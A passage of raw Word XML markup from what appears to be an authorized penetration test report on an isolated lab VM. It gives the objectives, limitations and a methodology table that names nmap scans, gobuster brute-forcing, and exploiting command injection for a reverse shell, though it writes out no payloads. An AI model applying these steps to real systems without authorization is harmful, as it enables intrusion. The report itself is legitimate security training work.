    <w:p w14:paraId="799B2E00" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00C64CEA">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5140AA23" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Authorization Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CBEF89" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This assessment was performed against a purpose-built training virtual machine within a fully isolated, locally hosted VMware lab network, with explicit authorization for educational and penetration-testing purposes. No production systems, third-party assets, or externally routable infrastructure were in scope or affected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B1270D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6133CDC0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Identify open ports and running network services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B692927" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enumerate and assess web </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5C84F3" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Identify authentication issues and information disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74653890" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Identify and validate injection vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A37E7CB" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Assess for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> remote code execution and gain initial access where possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC43DC5" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Assess privilege escalation opportunities from an initial foothold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C82A566" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Document any other relevant security weaknesses observed during testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B103D8D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Testing Limitations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69164208" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Testing was limited to the single target host (192.168.76.157) within the isolated lab network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F017D5" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Findings reflect the state of the target at the time of testing (August 23–24, 2026) and do not account for any subsequent changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CF0193" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Privilege escalation to the defender or root account was attempted but not achieved; this report does not claim root-level compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7C2AE9" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>No denial-of-service testing was performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C870390" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A079C4" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Testing followed a standard, phased penetration testing methodology consistent with industry practice (e.g., PTES-aligned), moving from passive/active reconnaissance through exploitation, post-exploitation, and evidence collection.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C64CEA" w14:paraId="092BAE8C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="016C0E80" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6550" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2975041E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Activities Performed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="45D91FD5" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BD3DFF3" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A43607B" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Identification of live hosts on the lab network segment (192.168.76.0/24).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="0AF15EB3" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35A6FD5B" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6550" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="625250C4" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host discovery via ICMP/ARP-based scanning (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="7F2BCB69" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68CAB74A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Port / Service Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43E68FEA" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Full TCP service and version detection (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sV</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -O).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="71E006F5" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E277F51" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Web Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6550" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C4C3026" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Directory and file brute-forcing (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gobuster</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>), manual source review, and hidden-comment analysis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="232B3C50" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A77C716" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="201D67FE" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Manual verification of suspected weaknesses (e.g., confirming reflected XSS via raw HTTP responses, confirming credential validity against the login endpoint).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="1FBFDA0E" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CB59603" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6550" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D48DFD5" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitation of confirmed OS command injection to obtain remote code execution and an interactive reverse shell.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="6EB8DED7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E1CFF50" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Post-Exploitation Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="597B6AB1" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Local enumeration of the compromised host as www-data: OS/kernel version, running processes, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> jobs, file permissions, and SUID binaries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="7309BD1F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4549D671" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privilege Escalation Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6550" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CB47C1A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Investigation of SUID binaries, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> jobs, and writable files as potential escalation vectors.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="4605E593" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57A939A2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Evidence Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
